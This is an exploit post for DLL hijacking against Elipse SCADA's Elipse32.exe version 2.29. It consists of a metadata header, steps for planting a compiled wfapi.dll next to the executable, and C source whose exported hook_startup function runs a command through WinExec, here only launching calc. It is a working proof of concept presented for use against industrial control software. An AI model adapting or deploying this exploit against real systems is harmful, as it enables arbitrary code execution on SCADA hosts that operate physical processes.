#[+] Author: PETER CHENG #[+] Exploit Title: Elipse SCADA DLL Hijacking #[+] Date: 09-04-2015 #[+] Type: Local Exploits #[+] Tested on: WinXp/Windows 7 Pro #[+] Vendor Homepage: http://www.elipse.com.br/ #[+] Software Link: http://www.elipse.com.br/eng/download_scada.aspx #[+] Version: Elipse32.exe version - 2.29 b141] #[+] Create and Compile the file then rename it to wfapi.dll and put it to the dir which the same with file Elipse32.exe, double-click #to run Elipse32.exe to launch the app. #include <windows.h> #define DllExport __declspec (dllexport) DllExport void hook_startup() { exp(); } int exp() { WinExec("calc", 0); exit(0); return 0; }